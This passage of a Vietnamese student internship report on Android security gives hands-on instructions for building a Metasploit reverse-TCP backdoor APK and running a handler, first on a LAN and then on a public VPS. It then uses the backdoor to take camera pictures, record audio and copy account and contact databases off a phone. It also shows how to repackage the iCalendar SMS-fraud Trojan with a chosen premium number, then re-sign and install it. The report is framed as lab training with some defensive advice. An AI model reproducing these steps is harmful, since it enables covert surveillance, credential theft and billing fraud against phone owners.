như thường. Phổ biến nhất là hacker nội đội lốt những tổ chức hay công ty có uy tín

để đánh lừa chủ thuê bao bằng chương trình phần mềm thư ma Ghostmail. "tin tặc"

dễ dàng thảo ra những e-mail mạo danh với nội dung: "Hiện giờ tình trạng đánh cắp

mật khẩu thuê bao đang rất phổ biến, nhằm để phòng tránh, chúng tôi xin được gửi

tới quý khách chương trình phần mềm Tr-Protect (Vi rút Trojan sau khi đã đổi tên)".

Có khi chúng lại "đội lốt" chuyên gia lập trình chương trình diệt virus số 1 Việt Nam

Nguyễn Tử Quảng: "Ðể phòng chống virus Chernobyl 26- 4, chúng tôi hân hạnh gởi

tới quý ngài chương trình BKAV 383. Mong quý vị dùng thử Mọi ý kiến đóng góp

xin gửi về địa chỉ sau [email protected]". Khi nhận được những tin kiểu như

vậy, có không ít thuê bao dễ dàng "cắn câu" và cứ "tự nhiên" cho chạy chương trình

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 27

vi rút Trojan mà không hề nhận thức được rằng họ đang "tự nguyện" hiến mình thành

nạn nhân của bọn "tin tặc".

Như vậy, khi Trojan được kích hoạt trên máy của bạn và khi bạn truy cập

Internet thì Trojan có thể lấy mật khẩu truy cập mạng, lấy danh sách thư điện tử và

thậm chí cả cấu hình máy tính của bạn để gửi cho một địa chỉ thư điện tử của tên tin

tặc. Nhưng nguy hiểm hơn, Trojan còn gửi cả địa chỉ mạng IP, là địa chỉ mà nhà cung

cấp dịch vụ mạng (ISP) gán cho bạn lúc truy cập; tên tin tặc sẽ sử dụng địa chỉ IP của

bạn để thiết lập kết nối từ máy tính của hắn tới máy tính của bạn qua mạng Internet.

Trojan sẽ lấy thông tin, xóa thông tin...

Các thủ đoạn của Hacker

1. Giả danh nhà cung cấp dịch vụ: Hacker lấy danh nghĩa nhà cung cấp dịch vụ

Internet (ISP) gọi điện thoại hoặc gởi e-mail yêu cầu bạn cung cấp password hoặc

đổi password theo họ gợi ý. Hacker mail cho bạn một Attached File (tập tin .exe) cho

biết là file hỗ trợ sử dụng Internet nhưng thực chất đây là file ăn cắp password.

2. Lợi dụng sự tin tưởng khi mượn hoặc sửa chữa máy tính của bạn họ sẽ dễ

dàng lấy mật khẩu vì đa số người sử dụng đều thường xuyên Save Password vào máy.

3. Cài "gián điệp" vào máy tính của bạn: Ðây là phương thức cổ điển nhưng lại

là cách ăn cắp password thông dụng và hiệu quả nhất mà không tốn công sức, thường

là file Horse Trojan được gởi qua e-mail với những lời mời chào hết sức hấp dẫn,

kích thích tò mò. Nếu bạn mở file này thì ngay lập tức máy bạn đã bị nhiễm virus và

từ đó trở đi, password của bạn được thường xuyên gởi về cho Hacker ngay cả khi bạn

thay password mới.

Ðề phòng, tìm và diệt Trojan?

Ðể đề phòng bị nhiễm Trojan và các loại virus, bạn cần thận trọng khi tải các

tập tin trên mạng.

Ðể tìm và diệt Trojan, bạn cần tiến hành theo các bước sau:

1. Không nên tải và chạy thử những tập tin gắn kèm thư điện tử gửi cho bạn từ

những địa chỉ thư điện tử mà bạn không rõ. Cũng vì lý do này mà tác giả của

chương trình diệt vi rút thông dụng BKAV đã cảnh báo có nhiều kẻ mạo

danh gửi cho bạn chương trình diệt virus mà thực chất là Trojan.

2. Sử dụng chương trình phát hiện và diệt Trojan, bạn có thể tìm kiếm trên

mạng Internet với từ khóa "Detect and destroy Trojan".

3. Nếu bạn không có sẵn trong tay những chương trình phát hiện và diệt Trojan

thì bạn có thể kiểm tra Registry của Window: HKEY – LOCAL –

MACHINE \ Software \ Microsoft \ Windows \ Current Version \ Run. Nếu

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 28

thấy có đường dẫn tới một chương trình mà bạn biết là không phải của

Window hoặc của các chương trình tiện ích, bạn hãy thoát Window về chế

độ DOS và xóa tập tin theo đường dẫn của Registry, vào lại Window và xóa

dòng đã ghi trong Registry. Bạn cũng có thể kiểm tra cả tập tin Win.ini,

System.ini trong thư mục C:\Windows sau mục Run hoặc Load.

3.2. Giới thiệu về Malware

Malware (phần mềm ác tính) viết tắt của cụm từ Malicious Sofware, là một phần

mềm máy tính được thiết kế với mục đích thâm nhập hoặc gây hỏng hóc máy tính mà

người sử dụng không hề hay biết.

Theo thống kê của các hãng bảo mật trên thế giới thì hiện các Malware hiện nay

mới chỉ dừng lại ở mức độ xâm nhập và ăn cắp thông tin của người dùng và nó chưa

có cơ chế lây lan. Theo các kết quả trên thì Malware trên Smartphone hiện nay về

cách thức hoạt động giống như một phần mềm gián điệp (Trojan) hơn là một virus

phá hủy.

Cơ chế hoạt động của Malware

Malware này hoạt động qua hai giai đoạn:

- Giai đoạn đầu: Malware được nhúng vào trong một ứng dụng và sẽ chiếm được

quyền root vào thiết bị của bạn ngay sau khi bạn chạy ứng dụng đó trong lần sử dụng

đầu tiên.

- Giai đoạn 2: Malware tự động cài đặt một ứng dụng thứ 2 với một permission

đặc biệt cho phép quyền uninstall. Một khi các ứng dụng thứ 2 được cài đặt, nó có

thể gửi các thông tin nhạy cảm tới một máy chủ từ xa và âm thầm tải thêm các ứng

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 29

dụng khác. Việc cài đặt ứng dụng hệ thống này nhằm ngăn ngừa người dùng xem

hoặc gỡ bỏ cài đặt các ứng dụng mà không được phép.

Không giống như giai đoạn đầu, người dùng phải khởi động ứng dụng để bắt

đầu việc lây nhiễm. Ở giai đoạn thứ hai ứng dụng tự động làm một số việc như là

confirm, check-in. Một điều nữa khiến cho bạn không thể biết chúng hoạt động lúc

nào (hầu hết vào khoảng thời gian từ 11h đêm tới 8h sáng ngày hôm sau). Đây là

khoảng thời gian mà điện thoại ít có khả năng được sử dụng nhất. Điều này làm cho

người dùng khó khăn hơn trong việc phát hiện một hành vi bất thường trên chiếc

smartphone của mình.

Mục đích của Malware

Mục đích của Malware mới chỉ dừng lại ở mức độ làm cho chiếc điện thoại của

người dùng tự động cài đặt những ứng dụng chứa mã độc khác. Tuy nhiên các biến

thể về sau đã kịp thời biến đổi để gây ra các mối nguy hại lớn hơn rất nhiều. Ví dụ

như Hippo SMS được tìm thấy mới đây có khả năng tự gửi tin nhắn mà không cần

sự cho phép của người dùng, việc này sẽ khiến tiền cước phí của người dùng tăng lên

một cách chóng mặt mà người dùng không biết rõ lí do tại sao. Hoặc một Malware

khác là Zitmo, Malware này đưa ra các ứng dụng kích hoạt mọi hành động liên quan

đến dịch vụ ngân hàng, tiếp nhận SMS gửi đến và chuyển tới máy chủ. Các đoạn

code dùng 1 lần mà các ngân hàng thường gửi tới khách hàng thông qua tin nhắn

SMS để chứng thực sẽ bị thu thập bởi các malware này.

Hiện nay còn có một số Malware còn có khả năng nghe lén tất cả các cuộc điện

thoại. Vấn đề này thực sự nguy hiểm khi tất cả các vấn đề riêng tư của chúng ta đang

bị một theo dõi, vì vậy những mối nguy hiểm từ mã độc trên Android đang thực sự

đe dọa đến an sự an toàn của người dùng hệ điều hành này.

4. Tạo mã độc trên Kali Linux

Ta sử dụng Metasploit framework trên Kali Linux để tạo một payload, khi

máy android tải về và mở payload lên thì sẽ bị xâm nhập và điều khiển. Nếu sử

dụng máy ảo Kali Linux bằng VMware, ta nên thiết lập phần Network như sau:

Bấm vào VM -> Settings... ở thanh lựa chọn của VMware

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 30

Hình 2.1.24 Setting network VMware (Step 1)

Bấm vào Network Adapter và chọn Bridged: connection directly to the

physical network

Hình 2.1.25 Setting network VMware (Step 2)

Bấm vào Edit -> Virtual Network Editor...

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 31

Hình 2.1.26 Setting network VMware (Step 3)

Trên phần Bridge (connect VMs directly to the external network) chọn

adapter của máy thật

Hình 2.1.27 Setting network VMware (Step 4)

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 32

Sau đây ta vào phần chính tạo backdoor và xâm nhập điều khiển android

Đầu tiên mở terminal và gõ dòng lệnh

msfpayload android/meterpreter/reverse_tcp lhost=192.168.0.104

lport=8080 R > /root/Desktop/files.apk

192.168.0.104 là địa chỉ IP của máy Kali, ta có thể sử dụng lệnh ifconfig để xem

IP của máy Kali

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 33

8080 là số port, có thể chọn port khác, không nên chọn các port thường sử dụng

Lệnh trên sẽ tạo ra 1 file files.apk trên desktop của Kali, đây chính là một

Metasploit reverse tcp backdoor.

Tiếp theo, gõ lệnh msfconsole

Sau khi msfconsile load xong, ta tạo một handler để xử lí dữ liệu truyền về bằng

cách gõ lệnh sau:

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 34

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set lhost 192.168.0.104 – [nhập địa chỉ IP giống với khi tạo payload ở trên].

set lport 8080 – [nhập port giống với port khi tạo payload ở trên].

Exploit

Màn hình sẽ như sau, lúc này ta đang chờ một máy android mở backdoor.

5. Đưa mã độc vào thiết bị Android

Vì không có máy Android thật nên mình test thử với một máy Galaxy Nexus

giả lập bằng phần mềm GennyMotion (đăng ký một tài khoản và donwload tại

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 35

https://cloud.genymotion.com/page/launchpad/download/), tải về files.apk, cài đặt

và mở lên được giao diện như dưới, nhấp vào nút “ReverseTCP”:

Vậy là ta đã kết nối thành công tới máy Android này, ở msfconsole sẽ như

sau:

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 36

Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem

ở danh sách camera ở phần trước. Ví dụ như sau:

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 37

File hình đã chụp từ camera của máy android là FrumITki.jpeg được lưu ở

/root của máy.

Ghi âm

Để thực hiện ghi âm, nhập lệnh record_mic và file ghi âm sẽ được lưu về máy

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 38

6. Xâm nhập SD card của thiết bị Android từ Kali Linux

Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư

mục

Ví dụ ở đây, ta tải file App.apk trong thư mục download của sdcard

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 39

Dùng lệnh cd /sdcard/Download để vào thư mục

Như trên hình, ta thấy 1 file là App.apk, để tải về máy, ta nhập lệnh

Download App.apk

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 40

Và file này sẽ được tải về thư mục /root của máy Kali

7. Cài đặt, nghiên cứu Trojan iCalendar trên Android

7.1. Giới thiệu

iCalendar là một phần mềm được tích hợp mã độc có xuất xứ từ Trung Quốc,

người dùng cài đặt chương trình sau khi chạy chương trình sẽ tự động gửi tin nhắn

mà không hề mong muốn. Bằng cách này, điện thoại của nạn nhân sẽ bị trừ tiền mà

không rõ nguyên do.

Yêu cầu

Dể thực hiện nghiên cứu, đầu tiên chúng ta phải cài những chương trình sau :

Java JDK

Java là một công nghệ xây dựng các ứng dụng phần mềm. Nó được coi là

công nghệ mang tính cách mạng và khả thi nhất trong việc tạo ra các ứng dụng có

khả năng chạy thống nhất trên nhiều nền tảng mà chỉ cần biên dịch một lần.

Java còn là một nền tảng phát triển và triển khai ứng dụng trong đó máy ảo Java, bộ

thông dịch có vai trò trung tâm.

Chúng ta có thể tải Java JDK về tại:

http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-

2133151.html

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 41

Tại đây, ta chỉ việc ấn vào Accept LicenseAgreement rồi chọn phiên bản để

tải về.

Android SDK

Android SDK là một máy ảo của Android trên PC. Android SDK giúp hỗ trợ

lập trình các ứng dụng của Android trên PC, hỗ trợ bạn những chức năng không

khác gì một chiếc máy thật.

Ta có thể tải Android SDK tại: http://developer.android.com/sdk/index.html

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 42

Đầu tiên, ta sẽ giải nén thư mục vừa tải về. Sau đó vào eclipse.exe trong thư

mục eclipse.

Kế tiếp ta vào Windows -> Android SDK Manager và chọn phiên bản

Android muốn tải về, sau đó ta ấn Install -> Accept License -> Install.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 43

Sau khi tải xong, ta vào Windows -> Android Virtual Device Manager và tạo

một smartphone hệ điều hành Android theo ý thích.

Sau đó ta ấn Start và một smartphone ảo với hệ điều hành Adroid đã lựa chọn

sẽ hiện ra.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 44

Apktool

Apktool là công cụ dùng để giải mã các file apk và jar, phục vụ cho việc tùy

chỉnh, sửa đổi các file đó.

Ta có thể tải về tại: https://code.google.com/p/android-apktool/

7.2. Hướng dẫn thực hiện Trojan iCalendar trên Android

Trước tiên, ta copy file iCalendar.apk vào thư mục apktool và mở CMD rồi

di chuyển vào thư mục apktool. Kế tiếp ta giải mã iCalendar bằng lệnh :

Apktool if iCalendar.apk

Apktool d iCalendar.apk

Vậy là ta đã tạo được thư mục giải mã iCalendar ta vào thư mục đó rồi vào

smali ->com -> mj -> iCalendar.

Tại đây, ta mở file iCalendar.smali rồi sử số trong dấu ngoặc kép của line

252 thành số điện thoại sẽ nhận tin nhắn và nội dung tin nhắn sẽ gửi tại local v1

ngay dưới đó.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 45

Ta làm tương tự với smsReceive.smali tại line 41.

Bây giờ ta sẽ biên soạn lại iCalendar bằng lệnh:

Apktool b iCalendar

Vậy là trong thư mục dist của iCalendar đã có một file iCalendar.apk dã được

biên soạn lại.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 46

Kế tiếp ta sẽ copy file vừa tạo vào thư mục cài đặt Java JDK để signing cho

nó. Sauk hi di chuyển vào thư mục Java JDK, ta dùng lệnh:

Keytool –genkey –v –keystore iCalendar.keystore –alias iCalendar –

keyalg RSA –keysize 2048 –validity 10000

Sau đó ta sẽ nhập password và điền một số thông tin tùy ý:

Sau đó ta dùng lệnh:

Jarsigner –verbose –keystore iCalendar.keystore iCalendar.apk

iCalendar

Jarsigner –verify –verbose –certs iCalendar.apk

Bây giờ ta copy file iCalendar.apk trong Java JDK vào thư mục sdk của

Android SDK và tiến hành cài chương trình vào máy ảo ( máy ảo phải mở sẵn) :

Adb –s emulator-5558 install iCalendar.apk

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 47

Với 5558 là số điện thoại của máy cài và iCalendar.apk là tên chương trình.

Vậy là bây giờ trong máy ảo đã có chương trình iCalendar.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 48

Chỉ cần mở iCalendar lên vài ấn vài lần là đã có một tin nhắn được gửi đi mà

không mong muốn

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 49

II. Làm trên trên môi trường VPS

1. Giới thiệu về VPS

Định nghĩa

Máy chủ ảo (Virtual Private Server -VPS) là phương pháp phân chia một máy

chủ vật lý thành nhiều máy chủ ảo. Trong khi trên một server chạy một Share Host

thì có thể có hàng trăm tài khoản chạy cùng lúc, nhưng trên server chạy VPS thì con

số này chỉ bằng 1/10. Do vậy, VPS có hiệu năng cao hơn Share Host rất nhiều.

Mỗi máy chủ là một hệ thống hoàn toàn riêng biệt, có hệ điều hành riêng, có

toàn quyền quản lý root và có thể restart lại hệ thống bất cứ lúc nào. Do vậy, VPS

hạn chế 100% khả năng bị hack local.

Trên 1 server chạy Share Host có nhiều Website chạy chung với nhau, chung

tài nguyên server, nếu 1 Website bị tấn công Ddos, botnet quá mạnh sẽ làm ảnh hưởng

đến các Website khác cùng server, riêng server VPS, một tài khoản trên VPS bị tấn

công thì mọi tài khoản khác trên VPS đều hoạt động bình thường.

VPS dành cho các doanh nghiệp vừa và những trang Web lớn hoặc mã nguồn

nặng, nếu chạy trên Share Host sẽ không đáp ứng đủ yêu cầu.Tuy nhiên, VPS đòi hỏi

người sử dụng phải có thêm một số kiến thức về bảo mật, cấu hình server,….

Đặc điểm về thông số VPS

Hoạt động hoàn toàn như một server riêng nên sở hữu một phần CPU riêng,

dung lượng RAM riêng, dung lượng ổ HDD riêng, địa chỉ IP riêng và hệ điều hành

riêng.

Tiết kiệm được nhiều chi phí so với việc thuê một server riêng.

Ngoài việc dùng VPS để thiết lập Web Server, Mail Server cũng như các ứng

dụng khác thì có thể cài đặt để thực hiện những yêu cầu riêng như truy cập Web bằng

trình duyệt Web trên VPS, dowload/upload bittorrent với tốc độ cao…

Trong trường hợp VPS bị thiếu tài nguyên thì có thể dễ dàng nâng cấp tài nguyên

mà không cần phải khởi động lại hệ thống.

Có thể cài lại hệ điều hành với thời gian từ 5-10 phút.

Giá trị khi sử dụng VPS

Server mạnh với nhiều cấu hình cho phép khách hàng dễ dàng lựa chọn gói VPS

phù hợp.

Miễn phí chi phí cài đặt ban đầu cũng như cấu hình hoạt động cho khác hàng.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 50

Hỗ trợ khác hàng cài đặt miễn phí thêm các phần mềm riêng.

Được cấu hình và cài đặt hệ thống Firewall và DDOS Protection.

Bộ phận kỹ thuật kịp thời can thiệp nhanh chóng nếu có sự cố phát sinh.

2. Cài đặt mã độc trên VPS

Giới thiệu

Metasploit là một công cụ khai thác lỗ hổng của các hệ điều hành, dùng để kiểm

tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn ngữ

hướng đối tượng Perl, với những components được viết bằng C, assembler, và

Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux, Windows, Mac

OS.

Cài đặt

Tải gói cài đặt của Metasploit, ở đây ta có 2 phiên bản là Pro và Community.

Ta chọn phiên bản Community miễn phí và dùng cho nghiên cứu.

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 51

Sau khi tải về gói cài đặt của Metasploit Community ta cài đặt như những

phần mềm khác.

Chọn folder cài đặt:

Cổng của dịch vụ Metasploit sẽ sử dụng, mặc định là 3790:

Chọn server và ngày hết hạn, để mặc định:

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 52

Quá trình cài đặt của Metasploit:

Tiến trình hoàn tất, chọn Finish và truy cập đến giao diện web của chương

trình:

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 53

Sau khi Finish trình duyệt web mở lên và đi tới giao diện

Click vào link: https://localhost:3790/ sẽ dẫn đến trang tạo tài khoản để login

vào

Metasploit. Điền Username, Password sử dụng và một số thông tin bổ xung, rồi

chọn Create Account:

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 54

Trình duyệt chuyển đến trang nhập key để active chương trình, key này được

gửi miễn phí đến mail khi tải phần mềm. Sau khi điền key nhấn Activate License:

Giao diện chương trình Metasploit Console

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 55

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 56

3. Từ VPS xâm nhập vào thiết bị Android

a. Các bước thực hiện

Sử dụng Kali Linux để tạo file APK làm backdoor để hack vào Android như trên

mang LAN với địa chỉ IP là địa chỉ của VPS

Chúng ta vẫn sử dụng lệnh

msfpayload android/meterpreter/reverse_tcp lhost=14.0.21.132 lport=4444 R

> /root/Desktop/files.apk

Ở đây địa chỉ VPS là 14.0.21.132

Khởi động Metasploit Console trên VPS

Chúng ta thực hiện các bước xâm nhập như đã đề cập ở phần trên, ở đây chỉ khác

là sử dụng chính IP của VPS

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 57

Sau khi máy nạn nhân tải về file apk đã được tạo ra, máy android đó sẽ bị

hack

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 58

Sử dụng lệnh Help để xem các lệnh được metasploit hỗ trợ

Để xem thông tin về máy, nhập lệnh sysinfo

Để xem các tác vụ đang chạy gõ ps

Xem ip gõ ifconfig

Xem danh sách thư mục, file gõ ls

Sử dụng camera:

Để xem danh sách camera, nhập webcam_list

Để chụp hình bằng camera, nhập webcam_snap x với x là id của camera xem

ở danh sách camera ở phần trước.

Ghi âm

Để thực hiện ghi âm, nhập lênh record_mic và file ghi âm sẽ được lưu về

máy

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 59

Lấy file từ sd card

Để vào sdcard, nhập lệnh: cd /sdcard và lệnh ls để xem danh sách file, thư

mục

Dùng lệnh cd /sdcard/Download để vào thư mục

Để tải về máy, ta nhập lệnh

Download App.apk

Để upload gõ lệnh upload

Và file này sẽ được tải về thư mục root của máy Kali

Gõ shell để vào lệnh

kiểm tra xem có root chưa gõ

su

whoami

Nếu báo unknown id is 0 tức là đã root

ls -l danh mục file và các quyền

cd để chuyển hướng thư mục

Để ăn cắp tài khoản, mật khẩu, file apk và thay đổi các quyền

/DATA

/DATA/APP

/DATA/SYSTEM

/DATA/SYSTEM/accounts.db

/DATA/SYSTEM/SYNC/accounts.xml

/SYSTEM/APP/

để xem danh sách và down load các file hay thay đổi các file trong ROM

đầu tiên phải gõ lệnh SU để có toàn quyền truy cập

để có đường dẫn đầy đủ dùng lệnh chmod -R 777 path to filename

Ví dụ chmod -R 777 /data

Ctrl + C để quay lại

Sử dụng SQLite để mở file db

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 60

4. Đánh cắp tài khoản

Trước tiên ta phải vào hệ thống của máy android. Lưu ý: máy android này phải được

root trước đó.

Ta dùng lênh shell để vào hệ thống

Dùng lệnh su để toàn quyền truy cập

Dùng lệnh whoami để biết máy android đã được root chưa. Nếu rồi thì nó sẽ hiện

thông báo là:unknown uid 0

Ta gõ cd /data/system để vào thư mục system

Tiếp theo gõ ls –l để xem trong thư mục có gì

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 61

Ta gõ lệnh cp accounts.db /sdcard để copy file accounts.db về Sdcard

Sau đó ta trở về meterpreter bằng lệnh exit rồi dùng lệnh

download file accounts.db về máy VPS của chúng ta

Tiếp tục ta vào địa chỉ

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 62

/data/data/com.android.providers.contacts/databases

để copy file contacts2.db về Sdcard

Sau đó ta download file contacts2.db về máy VPS

Ta mở file *.db bằng phần mềm SQLite. Ta có thể down phần mềm đó về vài cài vào

VPS của chúng ta

Báo cáo thực tập GVHD: Thầy Võ Đỗ Thắng

SVTT: Tô Thị Hường – 1120066

Trang 63

III. KẾT QUẢ ĐẠT ĐƯỢC

Những kiến thức lý thuyết đã được củng cố:

Tìm hiểu về lịch sử, quá trình phát triển của hệ điều hành Android

Tìm hiểu về hệ điều hành Kali Linux

Tìm hiểu về các lỗ hổng bảo mật của Windows và Android

Tìm hiểu về cách sửa đổi file APK và thực hiện Signing ứng dụng

Những kỹ năng thực hành đã được học thêm:

Thực hiện cài đặt Android trên máy ảo

Cài đặt Kali Linux, sử dụng nó để hack vào các lỗ hổng bảo mật của

Windows và Android

Thi lấy chứng chỉ System Hacking của trung tâm Athena

Thực hiện sửa đổi, tạo ra các file Trojan, Backdoor sau đó cài đặt vào

Android

Biết thêm về một số bài học trong lớp Hacker mũ trắng

Những kinh nghiệm thực tiễn đã tích lũy được:

Qua gần 2 tháng thực tập, bản thân em đã đúc kết được nhiều kinh nghiệm

quý báu, thứ nhất đó là các kĩ năng về chuyên môn, em đã được học và cũng cố các

kiến thức mới bên cạnh các kiến thức nền tảng. Hơn đó nữa là quá trình thực tập

trong môi trường doanh nghiệp đã cho em làm quen dần để không bỡ ngỡ trong quá

trình đi làm sau này, thông qua các kĩ năng giao tiếp và ứng xử.